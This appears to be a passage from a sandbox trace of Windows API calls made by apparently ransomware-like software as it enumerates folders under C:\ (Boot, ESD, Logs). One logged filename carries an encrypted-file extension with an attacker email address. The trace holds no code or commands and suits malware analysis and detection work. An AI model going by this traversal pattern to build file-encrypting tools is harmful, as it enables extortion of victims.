out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.387] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.387] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.387] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0286.387] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.387] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0286.387] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.387] FindFirstFileW (in: lpFileName="C:\\Boot\\uk-UA\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d68 [0286.388] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.388] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.388] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0286.388] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0286.388] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.388] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="updaterevokesipolicy.p7b", cAlternateFileName="UPDATE~1.P7B")) returned 1 [0286.388] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0286.388] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.388] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d68 [0286.389] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.389] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.389] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.389] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.389] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0286.389] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.389] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0286.389] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.389] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0286.390] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.390] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf958, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.390] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.390] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.390] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0286.390] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.390] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0286.390] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.390] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947fe8 [0286.391] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.391] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.391] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.391] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.391] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0286.391] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.391] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0286.391] FindClose (in: hFindFile=0x3947e28 | out: hFindFile=0x3947e28) returned 1 [0286.391] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3ff0728 | out: hHeap=0x470000) returned 1 [0286.391] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0286.392] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0286.392] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x5c6ee539, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c6ee539, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c82aaa5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x20fc, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="BOOTSECT.BAK.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="BOOTSE~1.MSP")) returned 1 [0286.392] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0286.392] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3ff0728 [0286.392] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="zh-TW", cAlternateFileName="ꤨL\x16")) returned 0xffffffff [0286.392] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3ff0728 | out: hHeap=0x470000) returned 1 [0286.392] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0286.393] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3ff0728 [0286.393] FindFirstFileW (in: lpFileName="C:\\ESD\\*", lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName=".", cAlternateFileName="")) returned 0x3947d68 [0286.393] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="..", cAlternateFileName="")) returned 1 [0286.393] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="..", cAlternateFileName="")) returned 0 [0286.393] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0286.393] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3ff0728 | out: hHeap=0x470000) returned 1 [0286.393] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xd02edbe2, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0286.393] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0286.393] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3ff0728 [0286.394] FindFirstFileW (in: lpFileName="C:\\Logs\\*", lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName=".", cAlternateFileName="")) returned 0x3947be8 [0286.395] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="..", cAlternateFileName="")) returned 1 [0286.396] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Application.evtx", cAlternateFileName="APPLIC~1.EVT")) returned 1 [0286.396] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="HardwareEvents.evtx", 